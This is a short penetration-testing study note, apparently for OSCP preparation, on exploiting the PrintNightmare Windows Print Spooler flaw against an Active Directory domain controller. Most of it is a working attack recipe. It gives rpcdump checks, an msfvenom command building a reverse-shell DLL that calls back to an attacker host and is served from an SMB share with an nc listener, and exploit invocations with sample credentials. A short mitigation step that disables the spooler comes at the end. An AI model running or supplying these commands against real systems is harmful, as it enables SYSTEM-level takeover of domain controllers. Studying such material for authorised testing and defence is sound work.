// notes/ Active Directory
🏛️
Critical Active Directory CVEs Printnightmare
The PrintNightmare vulnerability has to do with a flaw found in the Windows Print Spooler service. The flaw being that the service allows users to add printers and devices AND run…
#active directory#adot8
source · oscp.adot8.com · active-directory/critical-active-directory-cves_printnightmare ↗PrintNightmare
Overview
The PrintNightmare vulnerability has to do with a flaw found in the Windows Print Spooler service. The flaw being that the service allows users to add printers and devices AND runs as system.
This is a Post-Compromised attack and only needs a regular user account
PrintNightmare Attack
Check if the Domain Controller is vulnerable
bash
$rpcdump.py @192.168.1.129 | egrep 'MS-RPRN|MS-PAR'Desired Output
bash
$Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol $Protocol: [MS-RPRN]: Print System Remote ProtocolGenerate malicious DLL, host it and start listener
bash
$msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=1337 -f dll > shell.dll$smbserver.py share `pwd` -smb2support$nc -lnvp 1337Download and run this script.
bash
$python3 printnightmare.py pnpt.local/greg:Password1@192.168.1.129 '\\192.168.1.11\share\shell.dll'{% embed url="https://github.com/JohnHammond/CVE-2021-34527/tree/master/nightmare-dll/nightmare" %}
code
01Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"Mitigation
- Run Stop-Service Spooler
- REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f